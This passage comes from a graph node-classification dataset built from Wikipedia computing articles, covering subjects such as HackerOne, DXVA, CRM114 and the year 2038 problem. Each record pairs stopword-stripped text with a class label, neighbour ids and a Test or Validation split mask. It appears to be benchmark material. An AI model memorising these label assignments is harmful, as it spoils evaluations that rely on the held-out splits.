    "text": "Parodius:_The_Octopus_Saves_the_Earth:parodius octopus saves earth referred parodius scrolling shooter video game developed konami msx computer released japan game notable first title parodius series although often confused sequel parodius myth laughter name portmanteau gradius parody eponymously game parody gradius series space-based horizontally scrolling shooters many characters enemies derived famous shooter series elements extracted konami titles antarctic adventure twinbee game particular note series heavily infused japanese culture folklore gameplay similar gradius games aspects games twinbee however characters replaced silly characters taken either konami games well japanese culture music mostly taken classical music pieces player play either takosuke octopus penguin father pentarou antarctic adventure exclusive msx game penguin adventure goemon ganbare goemon series popolon knight msx game knightmare vic viper spaceship gradius game composed six stages consisting various obstacles enemies penguins bees well traditional gradius enemies moai gradius game utilizes similar selection-bar based power-up system parodius awarded best game never came u.s. 1992 electronic gaming monthly parodius later included konami antiques msx collection vol.3 playstation konami antiques msx collection ultra pack sega saturn parodius portable playstation portable enhanced graphics addition released mobile phones december 2006 wii virtual console january 12 2010 wii u december 25 2013 japan also msx version re-released windows pc online store project egg april 11 2014 japan addition disc 8 legend game music ~premium box~ released march 24 2005 devoted msx parodius",
    "neighbors": [
      4357,
      9006,
      11061,
      8887,
      1626
    ],
    "mask": "None"
  },
  {
    "node_id": 1764,
    "label": 4,
    "text": "HackerOne:hackerone hackerone vulnerability coordination bug bounty platform connects businesses penetration testers cybersecurity researchers one first companies along synack bugcrowd embrace utilize crowd-sourced security cybersecurity researchers linchpins business model largest cybersecurity firm kind july 2018 hackerone network consisted approximately 200,000 researchers resolved 72,000 vulnerabilities across 1,000 customer programs paid 31 million bounties 2011 dutch hackers jobert abma michiel prins attempted find security vulnerabilities 100 prominent high-tech companies discovered flaws companies including facebook google apple microsoft twitter dubbing efforts hack 100 abma prins contacted at-risk firms many firms ignored disclosure attempts coo facebook sheryl sandberg gave warning head product security alex rice rice abma prins connected together merijn terheggen founded hackerone 2012 november 2015 terheggen stepped role ceo replaced marten mickos november 2013 company hosted program encouraging discovery responsible disclosure software bugs microsoft facebook funded initiative known internet bug bounty project june 2015 hackerone bug bounty platform identified approximately 10,000 vulnerabilities paid researchers 1 million bounties september 2015 company launched vulnerability coordination maturity model then-policy chief katie moussouris described “ important effort hackerone codify reasonable minimum standards organizations handle incoming unsolicited vulnerability reports. ” april 2017 company announced 240 year-over-year customer growth europe subsequent opening additional european offices serve increasing customer demand may 2014 hackerone received 9 million usd series funding venture capital firm benchmark 25 million series b round led new enterprise associates angel investors include salesforce ceo marc benioff digital sky technologies founder yuri milner dropbox chief executive drew houston yelp ceo jeremy stoppelman series c round led dragoneer investment group netted 40 million february 2017 total 74 million investments date april 2017 european-based venture capital fund eqt ventures invested 40 million series c funding round march 2016 u.s. department defense dod launched initiative dubbed hack pentagon using hackerone platform 24-day program resulted discovery mitigation 138 vulnerabilities dod websites 70,000 usd bounties paid participating researchers october year dod developed vulnerability disclosure policy vdp first kind created u.s. government policy outlines conditions cybersecurity researchers may legally explore front-facing programs security vulnerabilities first use vdp launched part hack army initiative also first time branch u.s. military welcomed hackers find report security flaws systems hack army initiative resulted 118 valid vulnerability reports 371 participants including 25 government workers 17 military personnel took part approximately 100,000 usd total awarded participating researchers may 2017 dod extended program hack air force program led discovery 207 vulnerabilities netting 130,000 usd paid bounties end 2017 dod learned fixed thousands vulnerabilities vulnerability disclosure initiatives february 2017 hackerone sponsored invitation-only hackathon gathering security researchers around world hack e-commerce sites airbnb shopify vulnerabilities second hackathon company hosting one las vegas august 2016 black hat security conference throughout 2017 far 2018 hackerone hosted seven live hacking events cities across us europe 1 million bounty cash awarded events oath inc. called verizon media paying 400,000 bounties single event san francisco ca april 2018 october 2017 hackerone hosted first conference called security san francisco 200-attendee event included speakers dod general motors uber also featured talks hackers hackerone headquartered san francisco company maintains development office groningen netherlands april 2017 company announced addition offices uk germany",
    "neighbors": [
      5636,
      10726,
      711,
      1259,
      4623,
      1912,
      7257,
      7547,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1765,
    "label": 7,
    "text": "Mailchimp:mailchimp mailchimp capitalized mailchimp 2018 marketing automation platform email marketing service platform trading name operator rocket science group american company founded 2001 ben chestnut mark armstrong dan kurzius joining later date mailchimp began paid service added freemium option 2009 within year user base grown 85,000 450,000 june 2014 sending 10 billion emails per month behalf users 2017 company gaining 14,000 new customers every day company still owned co-founders never accepted venture capital funds 2016 mailchimp ranked 7 forbes cloud 100 list february 2017 company named one fast company innovative companies 2017 august 2017 reported mailchimp would opening offices brooklyn oakland california february 2019 mailchimp acquired lemonstand smaller competitor later 2019 company announced annual revenue would reach 700 million mailchimp going become full marketing platform aimed smaller organizations may 2019 new users charged per contact opposed subscribed contacts new users paying unsubscribed contacts yet confirmed podcast advertiser mailchimp also sponsored launch serial podcast exploring murder case multiple episodes series parodies serial targeted several show aspects including podcast sponsor especially meme mailkimp february 2016 mailchimp announced merging mandrill transactional email service mailchimp add-on feature gave customers 60 days notice switch new pricing structure find alternative service platform announcement met widespread criticism customer outrage due new pricing structure requiring paid mailchimp plan able purchase mandrill credits resulting customers paying two products order access mandrill previously customers able purchase mandrill credits sending emails without signing mailchimp credits originally priced 9.95 25,000 emails increased 20 number emails new pricing scheme addition needing purchase mandrill credits customers need paid mailchimp monthly plan minimum monthly plan 10 month even customer need mailchimp services wants access mandrill mandrill renamed mailchimp transactional",
    "neighbors": [
      970,
      4197,
      5830
    ],
    "mask": "Test"
  },
  {
    "node_id": 1766,
    "label": 3,
    "text": "Prpl_Foundation:prpl foundation prpl foundation non-profit computer industry association started imagination technologies others encourage use mips architecture “ open others ” promotion standards open source solutions particular focus equipment data centers networking devices internet things foundation manages projects specific topic areas via “ pegs ” prpl engineer groups including groups focused processor emulation qemu carrier-grade networking prplwrt based openwrt virtualization security organization also collects disseminates information interest members including patterns consumer use smart devices security issues 2016 organization released study prpl foundation smart home security report group also finds reports security issues smart devices members prpl include broadcom cavium ikanos imagination technologies ineda systems ingenic semiconductor lantiq nevales networks pmc-sierra qualcomm security peg includes several well cupp computing elliptic technologies imperas software kernkonzept seltech",
    "neighbors": [
      7234,
      4124,
      9863
    ],
    "mask": "None"
  },
  {
    "node_id": 1767,
    "label": 1,
    "text": "Diplomatic_Documents_of_Switzerland:diplomatic documents switzerland diplomatic documents switzerland dodis research project edits important documents swiss foreign relations contemporary history project includes book series several volumes online database dodis contrast editions foreign policy dodis state-run project product academic research research group chooses documents published according independently defined criteria bound scientific principles choice published documents researchers aim show main features international relations switzerland maintaining diversity basic research done dodis provides historians primary sources allowing work specific aspects swiss foreign policy contextualise complex developments diplomatic documents switzerland enterprise swiss academy humanities social sciences sagw works auspices swiss society history ssh funding administration project taken academy january 2000 swiss national science foundation snf major financial contributor dodis furthermore project supported swiss federal archives sfa research centre located federal department foreign affairs fdfa research centre diplomatic documents switzerland managed director director accountable dodis-committee consists representatives contributing organisations professors history departments switzerland 1972 group historians took initiative publish documents study swiss foreign policy international relations switzerland fifteen volumes covering period 1848 1945 subsequently published 1979 1997 volume published different team researchers based swiss university project restructured mid 1990s course planning second series dodis online-database various changing research teams replaced permanent research centre assigned staff work second series dodis covering period 1945 1989 started 1997 time database dodis.ch went online dodis.ch integrative freely accessible internet database diplomatic documents switzerland dodis contains thousands documentes primarily sourced swiss federal archives related swiss foreign relations database also links meta-data regarding persons organisations important international swiss history sources thus critically contextualised research extended dodis documents well relevant archival holdings relational database works addition printed volumes aims illustrate detail various aspects swiss international relations thousands documents dodis.ch contrary volumes annotated indexed tagged according scientific criteria documents dodis.ch scans downloaded pdf format book series several volumes aims illustrate main features guidelines international relations switzerland documents printed volumes therefore primarily either show general orientation swiss foreign relations indicate certain time strongly influenced orientation 1979 1997 first series published fifteen volumes covering period 1848 1945 volumes later digitalised accessed swiss federal archives search engine publications officielles numérisées uses full text search second series covering period 1945 1989 completed 2020 planned published fifteen volumes well recent volume vol 26 1973-75 published 2018",
    "neighbors": [
      9286
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1768,
    "label": 9,
    "text": "John_Launchbury:john launchbury john launchbury american british computer scientist currently chief scientist galois inc previously directed one darpa ’ technical offices oversaw nation-scale scientific engineering research cybersecurity data analysis artificial intelligence known research entrepreneurship implementation application functional programming languages 2010 launchbury inducted fellow association computing machinery launchbury received first-class honors mathematics oxford university 1985 m.sc computation 1986 holds ph.d. computing science university glasgow 1991 cambridge university press published thesis projection factorizations partial evaluation british computer society distinguished dissertation prize lecturer university glasgow launchbury focused early research semantics analysis lazy functional languages one contributing designers haskell programming language apple developers later cited one influences behind swift programming language 1993 launchbury provided formal description lazy evaluation addressing challenges analyzing program ’ storage requirements operational semantics widely cited later research haskell context glasgow haskell compiler team launchbury established effective partnership simon l. peyton jones write number papers dramatically influenced design haskell 1995 paper state haskell introduced “ io monad ” mathematically-clean practical way expressing effects external world solidified “ ” launchbury introduced earlier papers unboxed values removal intermediate data structures addressed many efficiency challenges inherent lazy evaluation 1994 launchbury relocated west coast united states becoming full professor oregon graduate institute 2000 research addressed creation optimization domain-specific programming languages dsls ranging fundamental research combining disparate semantic elements embedding dsls haskell applied research modeling reasoning very-large scale integration vlsi micro-architectures launchbury founded galois inc. 1999 address challenges information assurance application functional programming formal methods served company ’ ceo chief scientist 2000 2014 launchbury ’ direction galois inc. developed cryptol domain-specific language specifying verifying cryptographic implementations originally designed use national security agency language made available public 2008 launchbury holder two patents cryptographic structures data storage one effective mechanisms configuring programmable cryptographic components 2014 launchbury joined darpa initially program manager director information innovation office i2o 2015 launchbury led programs homomorphic cryptography proceed cybersecurity vehicles embedded systems hacms data privacy brandeis 2017 launchbury rejoined galois chief scientist launchbury published theological perspective moral exemplar interpretation doctrine atonement entitled change us god biblical meditations death jesus",
    "neighbors": [
      5527,
      4769,
      2818,
      3876,
      9926,
      6536,
      7887,
      1783,
      7292,
      10813,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1769,
    "label": 9,
    "text": "A-normal_form:a-normal form computer science a-normal form abbreviated anf intermediate representation programs functional compilers introduced sabry felleisen 1992 simpler alternative continuation-passing style cps advantages using cps intermediate representation optimizations easier perform programs cps source language also easier compilers generate machine code programs cps flanagan et al showed compilers could use anf achieve benefits one source-level transformation contrast realistic compilers cps transformation typically involves additional phases example simplify cps terms anf arguments function must trivial evaluation argument must halt immediately article deals basic definition expressed terms λ-calculus weak reduction let-expressions restriction enforced following bnf grammar describes pure λ-calculus modified support constraints anf variants anf used compilers research often allow constants records tuples multiargument functions primitive operations conditional expressions well expression written anf",
    "neighbors": [
      10560,
      8262,
      7245,
      5837,
      10510,
      10703,
      10395,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 1770,
    "label": 2,
    "text": "DirectX_Video_Acceleration:directx video acceleration directx video acceleration dxva microsoft api specification microsoft windows xbox 360 platforms allows video decoding hardware accelerated pipeline allows certain cpu-intensive operations idct motion compensation deinterlacing offloaded gpu dxva 2.0 allows operations including video capturing processing operations hardware accelerated well dxva works conjunction video rendering model used video card dxva 1.0 introduced standardized api windows 2000 currently available windows 98 later use either overlay rendering mode vmr 7/9 dxva 2.0 available windows vista windows 7 windows 8 later oss integrates media foundation mf uses enhanced video renderer evr present mf dxva used software video decoders define codec-specific pipeline hardware-accelerated decoding rendering codec pipeline starts cpu used parsing media stream conversion dxva-compatible structures dxva specifies set operations hardware accelerated device driver interfaces ddis graphic driver implement accelerate operations codec needs defined operations use interfaces access hardware-accelerated implementation operations graphic driver implement one interfaces codec provide software fallback decoded video handed hardware video renderer video post-processing might applied rendered device resulting pipeline usable directshow compatible application dxva specifies motion compensation ddi specifies interfaces idct operations huffman coding motion compensation alpha blending inverse quantization color space conversion frame-rate conversion operations among others also includes three sub-specifications deinterlacing ddi copp ddi procamp ddi deinterlacing ddi specifies callbacks deinterlacing operations copp certified output protection protocol ddi functions allow pipeline secured drm-protected media specifying encryption functions procamp ddi used accelerate post-processing video procamp driver module sits hardware video renderer display driver provides functions applying post-processing filters decompressed video functions exposed dxva ddis accessible directly directshow client supplied callback functions video renderer renderer plays important role anchoring pipeline dxva 2.0 enhances implementation video pipeline adds host ddis including capture ddi video capture ddis shares dxva 1.0 also enhanced ability use hardware acceleration operations also ddi functions directly available callers need mediated video renderer program also create pipeline simply decoding media without rendering post-processing rendering without decoding features require windows display driver model drivers limits dxva 2.0 windows vista windows server 2008 windows 7 windows server 2008 r2 windows 8 windows xp windows 2000 programs use dxva 1.0 dxva 2.0 allows enhanced video renderer video renderer vista windows 7 windows 8 windows xp dxva-rendering possible vmr9 well-known overlay mixer dxva integrates media foundation allows dxva pipelines exposed media foundation transforms mfts even decoder pipelines post-processing pipelines exposed mfts used media foundation topology loader create full media playback pipeline dxva 1.0 emulated using dxva 2.0 dxva 2.0 include copp ddi rather uses pvp protected content windows 7 implements dxva-hd driver complies wddm 1.1 dxva2 implementations come two variants native copy-back native implementation decoded video stays gpu memory displayed video decoder must connected video renderer intermediary processing filter video renderer must also support dxva gives less freedom choice renderers copy-back implementation decoded video copied gpu memory back cpu memory implementation n't limitations mentioned acts similarly normal software decoder however video stuttering occur gpu fast enough copy memory back cpu memory native mode advantageous unless need customized processing additional copy-back operations increase gpu memory load",
    "neighbors": [
      10243,
      5643,
      4624,
      10769,
      9234,
      1043,
      7699,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      10282,
      3629,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      2623,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      1644,
      622,
      9839,
      4210,
      7796,
      1656,
      5754,
      4731,
      6268,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      651,
      5259,
      653,
      6797,
      7309,
      2193,
      9874,
      10900,
      3224,
      4248,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      2749,
      8391,
      200,
      4811,
      9420,
      9932,
      214,
      9943,
      9434,
      11485,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      11487,
      4326,
      2279,
      11498,
      5355,
      3308,
      3821,
      10991,
      10993,
      2804,
      8438,
      3834,
      1791,
      8959,
      11519,
      5386,
      6927,
      3856,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      8995,
      5413,
      2854,
      11559,
      10024,
      3881,
      10026,
      10029,
      3886,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      3394,
      8514,
      1348,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      2402,
      4458,
      6506,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      9114,
      11677,
      10654,
      8607,
      929,
      10658,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      2493,
      960,
      4036,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      5090,
      6114,
      6115,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      4596,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 1771,
    "label": 4,
    "text": "CRM114_(program):crm114 program crm114 full name crm114 discriminator program based upon statistical approach classifying data especially used filtering email spam name comes crm-114 discriminator stanley kubrick movie piece radio equipment designed filter messages lacking specific code-prefix others done statistical bayesian spam filtering based upon frequency single word occurrences email crm114 achieves higher rate spam recognition creating hits based upon phrases five words length phrases used form markov random field representing incoming texts additional contextual recognition one accurate spam filters available initial testing 2002 author bill yerazunis gave 99.87 accuracy holden trec 2005 2006. gave results better 99 significant variation depending particular corpus crm114 classifier also switched use littlestone winnow algorithm character-by-character correlation variant knn k-nearest neighbor algorithm classification called hyperspace bit-entropic classifier uses entropy encoding determine similarity svm mutual compressibility calculated modified lz77 algorithm experimental classifiers actual features matched based generalization skip-grams crm114 algorithms multi-lingual compatible utf-8 encodings null-safe voting set crm114 classifiers demonstrated detect confidential versus non-confidential documents written japanese better 99.9 detection rate 5.3 false alarm rate crm114 good example pattern recognition software demonstrating machine learning accomplished reasonably simple algorithm program c source code available gpl deeper level crm114 also string pattern matching language similar grep even perl although turing complete highly tuned matching text even simple recursive definition factorial takes almost ten lines part crm114 language syntax positional declensional programming language may used many applications aside detecting spam crm114 uses tre approximate-match regex engine possible write programs depend absolutely identical strings matching function correctly crm114 applied number applications including detection bots twitter yahoo well first-level filter us dept transportation vehicle defect detection system also used predictive method classifying fault-prone software modules",
    "neighbors": [
      5249,
      8582,
      3336,
      4105,
      6762,
      8747,
      10541,
      6094,
      4272,
      1044,
      1305,
      9053
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1772,
    "label": 2,
    "text": "IPhone_XS:iphone xs iphone xs iphone xs max stylized marketed iphone iphone max roman numeral x pronounced ten smartphones designed developed marketed apple inc twelfth-generation flagships iphone succeeding iphone x announced september 12 2018 alongside lower-priced iphone xr steve jobs theater apple park cupertino apple ceo tim cook pre-orders beginning september 14 2018 official release september 21 2018 iphone xs max first plus-sized iphone new bezel-less form factor 2017 iphone x larger variant upon release xs xs max iphone x discontinued meaning shelf life 10 months shortest ever tenure flagship device history iphone release xs xs max starting prices 999/ 1099 us £999/£1099 uk €1149/€1249 europe rmb8699/rmb9599 china ₹99900/₹109900 india xs design visually near-identical x includes upgraded hardware featuring a12 bionic chip built 7 nanometer process also features 5.85-inch 149 mm oled display contains dual 12-megapixel rear cameras one 7-megapixel front-facing camera xs max features hardware cameras larger 6.46-inch 164 mm oled display battery 3,174mah also noted media xs received smaller battery x dropping 2,658 mah 2,716 mah xs battery new single-cell l-shaped battery iphone xs max battery remains two cells like iphone x. additionally apple states iphone xs lasts 30 minutes longer iphone x iphone xs max lasts 1.5 hours longer iphone x. apple claims devices faster face id technology also announced june 2019 wwdc face id iphone xs iphone xs max iphone xr iphone x would 30 faster ios 13 set arrive fall xs xs max rated ip68 dust water resistance iec standard 60529 apple specifying maximum depth 2 meters 30 minutes submersion water improvement ip67 water resistance iphone 8 x. apple performed tests various liquids including chlorinated water salt water tea wine beer juices unlike xr iphone xs devices optical zoom xs xs max support dual sims nano-sim esim mainland china hong kong macau however xs max comes dual nano-sim tray esim xs dual nano-sim tray esim functionality enabled use hong kong macau mainland china wireless charging coil made copper reduce charging time power loss iphones starting iphone 6s iphone 6s plus iphone se iphone 7 iphone 7 plus iphone 8 iphone 8 plus iphone x main camera 12mp 1/2.94 sensor size 1.22 μm pixel size starting iphone 2018 series xs xs max xr iphones updated 12mp 1/2.55 sensor size 1.4 μm pixel size sensor pixel size primary cameras samsung galaxy s10 samsung galaxy s9 samsung galaxy s8 samsung galaxy s7 pixel 2 pixel 3a pixel 3a xl pixel 3 pixel 3 xl moto x4 users reported problems charging iphone xs xs max lightning cable device failed charge would begin charge screen turned would occur due software bug apple ’ “ disable usb accessories locked ” setting feature intended prevent unknown devices accessing user content within iphone press dubbed issue chargegate issue resolved release ios 12.0.1 october 8 2018 customers also reported seeing unrealistic smoothness skin taking selfie automatic filter observers noted face-smoothing effect likely unintentionally caused new smart hdr camera feature xs xs max technology combines multiple photos varying exposures increase dynamic range iphones photos also lead less pronounced facial imperfections decreased highlights selfies speculated result hidden “ beauty mode ” actual feature smartphones dubbed issue “ beautygate. ” general dispute community whether camera actually intends perfect faces appear way result better quality camera apple said results due smart hdr algorithm incorrectly selecting blurrier long exposure base frame instead sharpest short exposure issue resolved software release ios 12.1 october 30 2018 iphone xs users issues lte wi-fi reception bluetooth connection radio expert claims faulty antenna blame apple contacted users help investigation ios 12.0.1 addresses issue bluetooth could become unavailable",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      1121,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      9863,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 1773,
    "label": 3,
    "text": "Door_Door:door door door door designed koichi nakamura known creator dragon quest part programming contest held enix early 1980 winning first prize enix given rights game ported game several japanese home computers chun name protagonist nickname given nakamura one friends door door critical commercial success— pc-8801 port alone sold 200,000 copies considered classic title famicom players control chun small spherical animal outfitted baseball cap chun relentlessly pursued quartet game ai aliens traveling unique deterministic algorithm paths predictable aliens namegon amechan follow chun direct path possible invekun deviates follows roundabout paths using ladders otapyon shadows chun jumps player objective trap aliens behind sliding doors positioned throughout level courses composed platforms conjoined assorted ladders trap aliens players approach door side handle open running across lure advancing villains inside shut door escape trapped doors opened chun jump avoid aliens whose touch spells death bombs nails sometimes appear screen also lethal player dies provided continues restart level previously trapped aliens vanished doors accessible status bar running along top playing screen gives player score high score level number number lives remaining points awarded trapping aliens behind doors extra points going players corral multiple aliens behind one door collecting confectionery intermittently appear disappear playing screen include striped piece candy ice pop lollipop bowl ice cream slice cake mahjong tile players begin three lives scoring 10,000 points awards player extra life scoring intervals 20,000 points thereafter awards player lives player loses lives game forcing player restart first level players advance levels become complicated many requiring abstract strategies eighth level pits chun lone otapyon alien player strategy requires purposely allowing otapyon shadow jumps intention guiding unsuspecting otapyon across level myriad platforms doorway alien remains doors closed player placed no-win situation tenth level flat expanse two namegon aliens one door illustrates dilemma level begins spaced far apart initially impossible guide aliens single door without one escaping allowing one escape however places closer counterpart turn enabling player trap player traps one must sacrifice one life stage impossible complete 50th level requires timing failure part guarantees impossible-to-win scenario previous case player option kamikaze continue play programming error another aspect game difficulty level unique trait door door games prevent scenario time limit super mario bros. physical restriction tetris ending door door completing final level game simply restarts first level although player keeps allocated score allowed build upon successive plays game inspired popularity personal computers united states yasuhiro fukushima decided set enix pc business 1982 fukushima n't programmer enix broad sense simply intended publishing company pool talent individual game designers enix sponsored national programming contest three hundred programs entered contest first prize went programming prodigy high school student koichi nakamura puzzle game door door yuji horii placed finals contest computer tennis game subsequently hired enix rights door door became property enix enix published game wide range japanese computers including nec pc-8801 fujitsu fm-7 sharp mz-2000 sales exceeding 200,000 copies door door huge success popularity budding console market prompted 1985 release nintendo famicom 1986 enix third famicom production first role-playing video game made hori nakamura household names japan dragon quest enix unique approach game company—contracting talent game development publishing games—started new trend computer video game industry like publishing companies writers enix established concept royalties contractors 1984 nakamura created relatively exclusive contracting company christened chunsoft honor door door diminutive hero expanded version game branded door door mkii released three years original february 1985 game ported msx computers nec pc-6001 pc-6001mkii pc-6601 pc-8801 pc-8801mkii pc-8801mkiisr models sharp mz-2000 fujitsu fm-7 features 100 levels option start game new set levels beginning level 51 encouraged rapidly increasing popularity video game consoles japan enix also ported door door nintendo famicom march 2004 chunsoft celebrated 20th anniversary releasing version door door japanese mobile phone networks faithful reproduction famicom version application available ntt docomo foma 505i 900i series phones downloaded i-chunsoft ¥300 per month right table licensed ports door door",
    "neighbors": [
      8355,
      10855,
      9006,
      7023,
      10931,
      4894
    ],
    "mask": "None"
  },
  {
    "node_id": 1774,
    "label": 8,
    "text": "Behavioral_retargeting:behavioral retargeting behavioral retargeting also known behavioral remarketing simply retargeting form online targeted advertising online advertising targeted consumers based previous internet actions retargeting tags online users including pixel within target webpage email sets cookie user browser cookie set advertiser able show display ads user elsewhere internet via ad exchange dynamic creative also known personalized retargeting allows advertiser display banner created on-the-fly particular consumer based specific pages viewed example consumer visits advertiser website browses products b c – retargeted display banner featuring exact products b c previously viewed typically restricted visitor browsing single website refined version improves re-engagement customers customer begins online order example fails complete flag indicates interest product ordered later ads showing product interest custom-linked point back order system user clicks ad returned incomplete order implementation requires order system support deep linking retargeting services retargeting depends setting cookies user browser several different methods retargeting ad campaigns usually run lower cost media display ads increases effectiveness specifically targeting interested audience also improves overall roi advertiser common use-case retargeting situations website visitor actions result sale conversion retargeting providers employ variety pricing models charge advertisers ads viewed consumers three prominent models include cost per impression cpm common metric used online advertising industry charge advertisers inventory based set price per thousand page impressions impression defined time banner ad loads individual ’ web browser pay per click ppc charges advertisers every verifiable click leads consumers back retailer ’ website unlike cpm model charges advertisers flat rate advertisers working ppc model charged person clicks ad cost per action cpa pricing model advertisers charged based pre-arranged action purchase view etc although completed sale common action used cpa model united states several organizations including federal trade commission congress media expressed privacy concerns around practice retargeting however responsible personalized retargeting providers ’ collect personally identifiable information pii consumers providers blind user ’ age sex personal information instead providers rely upon data gathered cookies placed consumer ’ browser websites visit information shared among publishers advertisers third parties linked specific user united states legislated many laws around practice instead relies upon industry overarching organizations interactive advertising bureau network advertising initiative truste self-regulate october 2010 iab announced advertising option icon partner sites place near banner advertisements collect non-pii user data eu 2002 eprivacy directive 2009 revision require opt-in consent use cookies stipulate users must given option opting",
    "neighbors": [
      1944,
      7965
    ],
    "mask": "Test"
  },
  {
    "node_id": 1775,
    "label": 2,
    "text": "Year_2038_problem:year 2038 problem year 2038 problem relates representing time many digital systems number seconds passed since 1 january 1970 storing signed 32-bit binary integer implementations encode times 03:14:07 utc 19 january 2038 like y2k problem year 2038 problem caused insufficient capacity chosen storage unit latest time represented unix signed 32-bit integer time format 2-1 2,147,483,647 seconds 1 january 1970 times beyond wrap around stored internally negative number systems interpret occurred 13 december 1901 rather 19 january 2038 caused integer overflow counter runs usable digit bits flips sign bit instead reports maximally negative number continues count zero positive integers resulting erroneous calculations systems likely cause problems users reliant parties programs work future dates begin run problems sooner example program works dates 20 years future fixed later 19 january 2018 may 2006 reports surfaced early manifestation y2038 problem aolserver software software designed kludge handle database request never time rather specifically handling special case initial design simply specified arbitrary time-out date future default configuration server specified request time one billion seconds one billion seconds approximately 32 years 01:27:28 utc 13 may 2006 beyond 2038 cutoff date thus time time-out calculation overflowed returned date actually past causing software crash problem discovered aolserver operators edit configuration file set time-out lower value players games apps programmed impose waiting periods running problem attempt work around waiting period devices harbor coding manually setting devices date past 19 january 2038 unable since 32-bit unix time format used embedded systems use dates either computation diagnostic logging likely affected 2038 bug many transportation systems flight automobiles use embedded systems extensively automotive systems may include anti-lock braking system abs electronic stability control esc/esp traction control tcs automatic four-wheel drive aircraft may use inertial guidance systems gps receivers however imply systems suffer bug since many systems require access dates systems track difference times/dates absolute times/dates nature calculation experience major problem case automotive diagnostics based legislative standards carb california air resources board another major use embedded systems communications devices including cell phones internet appliances routers wireless access points etc rely storing accurate time date increasingly based unix-like operating systems example bug makes devices running 32-bit android crash restart time changed date despite modern 18–24 month generational update computer systems technology embedded systems designed last lifetime machine component conceivable systems may still use 2038 may impractical cases impossible upgrade software running systems ultimately requiring replacement 32-bit codice_1 limitations corrected mysql database built-in functions like codice_2 return 0 03:14:07 utc 19 january 2038 many data structures use today 32-bit time representations embedded structure full list data structures virtually impossible derive well-known data structures unix time problem examples systems using data structures may contain 32-bit time representations include system making use data structures containing 32-bit time representations present risk degree risk dependent mode failure network time protocol ntp related overflow issue manifests 2036 rather 2038 64-bit timestamps used ntp consist 32-bit part seconds 32-bit part fractional second giving ntp time scale rolls every 2 seconds 136 years theoretical resolution 2 seconds 233 picoseconds ntp uses epoch 1 january 1900 first rollover occurs 2036 prior unix year 2038 problem implementations disambiguate ntp time using knowledge approximate time sources since ntp works differences timestamps never absolute values wraparound invisible calculations long timestamps within 68 years however wraparound clients still face two problems means ntp rollover invisible running systems since correct time within small tolerance however systems starting need know date within 68 years given large allowed error expected onerous requirement one suggested method set clock earlier system build date release date current version ntp software many systems use battery-powered hardware clock avoid problem even future versions ntp may extend time representation 128 bits 64 bits second 64 bits fractional-second current ntp4 format support era number era offset used properly aid fixing date rollover issues according mills 64 bit value fraction enough resolve amount time takes photon pass electron speed light 64 bit second value enough provide unambiguous time representation universe goes dim universal solution year 2038 problem change definition codice_1 data type would result code compatibility problems application date time representations dependent nature signed 32-bit codice_1 integer example changing codice_1 unsigned 32-bit integer would extend range 2106 specifically 06:28:15 utc sunday 7 february 2106 would adversely affect programs store retrieve manipulate dates prior 1970 dates represented negative numbers increasing size codice_1 type 64-bit existing system would cause incompatible changes layout structures binary interface functions also universal solution issue dvb atsc real-time transmitted dates due issues legacy receivers issue yet acknowledged resolved either organization workaround would discontinue time-related metadata services programming guides automatic date synchronization affected dates one possible option would create new table types affected part specifications use iso 8601 date strings rather fixed integers—as used iso 9660 iso 13346 filesystems operating systems designed run 64-bit hardware already use signed 64-bit codice_1 integers using signed 64-bit value introduces new wraparound date twenty times greater estimated age universe approximately 292 billion years 15:30:08 utc sunday 4 december 292,277,026,596 ability make computations dates limited fact codice_9 uses signed 32 bit integer value starting 1900 